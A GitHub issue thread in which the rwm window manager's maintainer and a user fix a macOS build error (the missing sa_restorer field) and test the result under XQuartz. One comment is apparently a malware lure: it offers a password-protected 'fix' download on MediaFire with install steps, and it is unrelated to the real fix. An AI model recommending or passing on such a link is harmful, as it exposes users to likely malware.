### ISSUE TITLE
Error Trying to Compile on MacOS (x86_64)

### ISSUE THREAD

**Issue by moonstripe** [ntBre/rwm#20]
My ask is so cursed that I didn't want to event submit it but figured I should.

```
error[E0560]: struct `sigaction` has no field named `sa_restorer`
   --> src/main.rs:235:13
    |
235 |             sa_restorer: None,
    |             ^^^^^^^^^^^ `sigaction` does not have this field
    |
    = note: all struct fields are already assigned

error[E0560]: struct `sigaction` has no field named `sa_restorer`
   --> src/key_handlers.rs:537:17
    |
537 |                 sa_restorer: None,
    |                 ^^^^^^^^^^^ `sigaction` does not have this field
    |
    = note: all struct fields are already assigned

For more information about this error, try `rustc --explain E0560`.
error: could not compile `rwm` (bin "rwm") due to 2 previous errors
error: failed to compile `rwm v0.1.0 (/Users/kojinglick/Downloads/rwm-1.0.1)`, intermediate artifacts can be found at `/Users/xxx/Downloads/rwm-1.0.1/target`.
To reuse those artifacts with a future compilation, set the environment variable `CARGO_TARGET_DIR` to that path.
```

**Comment by moonstripe** [comment]
Feel free to close it for just how absurd support for this machine would be.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ntBre** [comment]
Ah very interesting! Can you run a different window manager on Mac? I assumed you were stuck with the built in one.

I think this union can have different field names on different platforms, so it's probably an easy fix if this is the only error.

**Comment by moonstripe** [comment]
gotcha, i'll try to take a stab at it this weekend, but very cool project. 

currently trying it out on a more reasonable machine.

**Comment by ntBre** [comment]
Thank you! I was thinking about giving this a try today if you wanted. I'm pretty sure it's just a `#[cfg(target_os = "macos")]` in the right place (again if this is the only error), but I'm happy to let you take a stab if you want. I have access to an x86 Mac to test, but we can also add it to the CI matrix if we/you get it working.

**Comment by moonstripe** [comment]
By all means, go for it. Definitely worth the experiment. (Got it up and running easy peasy on my Ubuntu setup.)

**Comment by ntBre** [comment]
Alright, this is great! I got the test matrix updated and can reproduce the error here in CI. Now I just have to fix it.

**Comment by ntBre** [comment]
Well that went well. It's compiling and passing the test in CI. If you don't mind, give the branch in #21 a try, and then I'll merge it if everything works.

**Comment by moonstripe** [comment]
Output from XQuartz (X11 emulator) Terminal

```
â rwm
rwm: fatal error: request code=2, error code=10
X Error of failed request:  BadAccess (attempt to access private resource denied)
  Major opcode of failed request:  2 (X_ChangeWindowAttributes)
  Serial number of failed request:  7
  Current serial number in output stream:  8
```

**Comment by moonstripe** [comment]
i'm trying all these weird hacks and work arounds... until i look up and ????

<img width="156" alt="Screenshot with rwm 1.0" src="https://github.com/user-attachments/assets/c753f598-4168-4627-95bc-cc1abc93850e">
<img width="346" alt="Screenshot 2024-09-02 at 01 18 46" src="https://github.com/user-attachments/assets/6550a6d5-540b-4a6f-a801-f54f818eb84e">

**Comment by moonstripe** [comment]
beautiful.

**Comment by moonstripe** [comment]
<img width="491" alt="Screenshot 2024-09-02 at 01 21 10" src="https://github.com/user-attachments/assets/97a88cc3-45c3-49fb-ab16-29dee3e0d758">

**Comment by moonstripe** [comment]
New error messages after changing mod to option and rebuilding:
```
// Mod + P
rwm: execvp '0x10dbe4609' failed:
// Mod + Shift + Enter
rwm: execvp '0x10dbe463c' failed:
```

**Comment by ntBre** [comment]
This is awesome! I've actually used XQuartz many years ago but didn't realize you could run a whole window manager in it. Those very uninformative error messages are from the `spawn` function connected to those keybindings. By default, Mod+p should open dmenu and Mod+Shift+Enter opens the st. Do you have both of those installed? I'm not really sure why else `execvp` would fail unless it takes different arguments on Mac.

**Comment by moonstripe** [comment]
I think it's just an installed packages error. 

Gonna take another look at it tonight, but at least for the janky support I was curious about, I think we're there.

**Comment by ntBre** [comment]
Awesome, I'll probably merge the PR later today to make sure none of my other changes in the meantime have caused issues. We can always add more fixes later in a separate PR now that this one got it building and tested in CI.

**Comment by moonstripe** [comment]
Added a review for formality (just a couple of #[cfg]s to enable building to MacOS).

LGTM!
